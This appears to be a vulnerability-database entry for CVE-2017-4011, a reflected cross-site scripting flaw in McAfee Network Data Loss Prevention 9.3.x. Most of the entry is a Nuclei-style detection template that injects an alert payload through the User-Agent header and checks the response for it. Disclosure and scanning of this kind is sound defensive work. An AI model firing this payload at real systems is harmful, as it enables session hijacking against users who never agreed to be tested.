CVE-2017-4011: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: McAfee Network Data Loss Prevention | POC: 已公开

漏洞描述

McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.

PoC代码[已公开]

id: CVE-2017-4011

info:
  name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.
  reference:
    - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10198
    - https://nvd.nist.gov/vuln/detail/CVE-2017-4011
    - http://www.securitytracker.com/id/1038523
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-4011
    cwe-id: CWE-79
    epss-score: 0.1089
    epss-percentile: 0.93136
    cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mcafee
    product: network_data_loss_prevention
  tags: cve,cve2017,mcafee,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4a0a00473045022025fa43c0028ad4ea22074319ff2d70a133ea775c972181c0700a8354f537575a022100fa243d01a77ad189c6302054a8b9efe3e9a7090f2c13203f8792eef8874f256b:922c64590222798bb761d5b6d8e72950